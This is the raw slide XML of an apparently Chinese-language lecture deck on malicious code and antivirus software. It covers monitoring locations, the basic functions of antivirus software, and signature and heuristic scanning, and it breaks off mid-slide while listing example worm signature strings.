                                              <p:pRg st="9" end="9"/>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2" presetClass="entr" presetSubtype="4" fill="hold" grpId="0" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="63" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="287755">
                                            <p:txEl>
                                              <p:pRg st="11" end="11"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="slide(fromBottom)">
                                      <p:cBhvr>
                                        <p:cTn id="64" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="287755">
                                            <p:txEl>
                                              <p:pRg st="11" end="11"/>
                                            </p:txEl>
                                          </p:spTgt>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87755">
                                            <p:txEl>
                                              <p:pRg st="12" end="12"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="slide(fromBottom)">
                                      <p:cBhvr>
                                        <p:cTn id="67" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="287755">
                                            <p:txEl>
                                              <p:pRg st="12" end="12"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="68" presetID="12" presetClass="entr" presetSubtype="4" fill="hold" grpId="0" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="69" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="287755">
                                            <p:txEl>
                                              <p:pRg st="13" end="13"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="slide(fromBottom)">
                                      <p:cBhvr>
                                        <p:cTn id="70" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="28775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4" grpId="0" animBg="1"/>
      <p:bldP spid="287754" grpId="1" animBg="1"/>
      <p:bldP spid="287755" grpId="0" build="allAtOnce" animBg="1"/>
      <p:bldP spid="28775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B348748-AC4D-4CBD-B476-E7B682DAA26E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>2.5.1. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>杀毒软件的基本原理</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20483" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5B1D6CD7-4A65-4299-92D3-C45698CF7ACE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>杀毒软件就是一个信息分析系统，它监控所有的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="C0C0C0"/>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>数据流动</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，当它发现某些信息被感染后，就会清除其中的病毒。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>内存－硬盘</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>网络－内存</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>网络－硬盘</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>信息的分析（或扫描）方式取决于其来源，杀毒软件在监控光驱、电子邮件或局域网间数据移动时工作方式是不同的 </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="158724" name="Rectangle 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{342A282D-A52B-4D77-B545-C8DA1B54F603}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4267200" y="4051300"/>
            <a:ext cx="457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8725" name="Rectangle 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2E081637-9EE6-4790-BBB6-DF42002DFC8C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6858000" y="4051300"/>
            <a:ext cx="4572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158726" name="Line 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9BA408D4-643F-410E-B32B-478E84930C80}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4724400" y="4292600"/>
            <a:ext cx="2133600" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="57150">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>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D674E00-84DF-47D1-8456-0807090E2C6A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>2.5.1. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>杀毒软件的基本原理</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="159747" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{23DBB662-0956-443F-961B-6EDEF5EBB4FB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000"/>
              <a:t>部署位置：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="4000"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600"/>
              <a:t>主机</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3600"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600"/>
              <a:t>边界</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3600"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600"/>
              <a:t>分布式情报搜集 </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E3D8F8B-631A-4603-A810-DFE4DEAFB5D3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>2.1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>恶意代码的定义</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30723" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{973A1031-6D1F-4788-939E-38074E9F8A8A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>恶意代码，又称</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Malicious Code</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>，或</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>MalCode, MalWare</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>设计目的是用来实现某些恶意功能的代码或程序。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>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1BEADF6D-C0AA-4B14-B5E2-3264EE37A762}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>2.5.2. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>杀毒软件的监控位置</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="160771" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{190AA9B7-662B-498B-9A1C-C1DD761509EA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>内存监控：当发现内存中存在病毒的时候，就会主动报警；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>监控所有进程；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>监控读取内存中的文件；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>监控读取内存的网络数据；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>文件监控：当发现写到磁盘上的文件中存在病毒，或者是被病毒感染，就会主动报警；</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>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3FEA146E-D213-4D9C-BD8E-16B4CA5C3162}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>2.5.3.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>杀毒软件的基本功能</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="162819" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C96102D4-1468-4F86-941F-E319719A30A0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" b="1"/>
              <a:t>防范病毒</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600"/>
              <a:t>：指根据系统特性，采取相应的系统安全措施预防病毒侵入计算机。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2600"/>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2600"/>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" b="1"/>
              <a:t>查找病毒</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600"/>
              <a:t>－指对于确定的环境，能够准确地报出病毒名称，该环境包括，内存、文件、引导区（含主导区）、网络等。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2600"/>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2600"/>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" b="1"/>
              <a:t>清除病毒</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600"/>
              <a:t>－指根据不同类型病毒对感染对象的修改，并按照病毒的感染特性所进行的恢复。该恢复过程不能破坏未被病毒修改的内容。感染对象包括：内存、引导区（含主引导区）、可执行文件、文档文件、网络等。 </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600"/>
            </a:br>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2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D6B46AD-8F4B-4B26-9E0B-F2E75DAB3D1D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>2.5.4. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>核心模块－病毒扫描引擎</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8195" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9EEA7C17-BD74-4FC3-A60F-DCE77676A99E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>特征码扫描</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>：将扫描信息与</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="C0C0C0"/>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>病毒数据库</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>（即所谓的“病毒特征库”）进行对照，如果信息与其中的任何一个病毒特征符合，杀毒软件就会判断此文件被病毒感染。 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>启发式扫描</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>：通过分析信息的行为并将其与一个危险行为样式库进行对照以判别信息的危险性 。</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F0F1C38-4F42-4D68-B1B0-A73F36D00AB5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>特征码识别法－机制 </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9219" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7A7F20B1-767B-4E37-B179-4C8A6448ED3A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>杀毒软件在进行查杀的时候，会挑选文件内部的一段或者几段代码来作为他识别病毒的方式，这种代码就叫做病毒的特征码；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="C0C0C0"/>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>病毒样本</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>中，抽取特征代码 ；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>抽取的代码比较特殊，不大可能与普通正常程序代码吻合；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>抽取的代码要有适当长度，一方面维持特征代码的唯一性，另一方面保证病毒扫描时候不要有太大的空间与时间的开销。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN"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FD774DE5-076E-42C2-A126-AEF2777174D4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>特征码识别法－特征码</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="166915" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2E63DDDB-0F73-4FE5-BFD5-C3FDA50768C9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>文件特征码：对付病毒在文件中的存在方式；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>单一文件特征码</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>复合文件特征码：通过多处特征进行判断</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>内存特征码：对付病毒在内存中的存在方式；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>单一内存特征码 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>复合内存特征码</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A67AE6DD-F8D5-432C-A21C-6A59DD6A214D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>特征码示例</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="167939" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{738B508F-ED18-4821-85C8-446B2C4A13E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1187450" y="4437063"/>
            <a:ext cx="7620000" cy="2232025"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>“***武*汉*男*生*感*染*下*载*者***”</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>whboy”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>以及“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>xboy”</a:t>
            </a:r>
            <a:r>
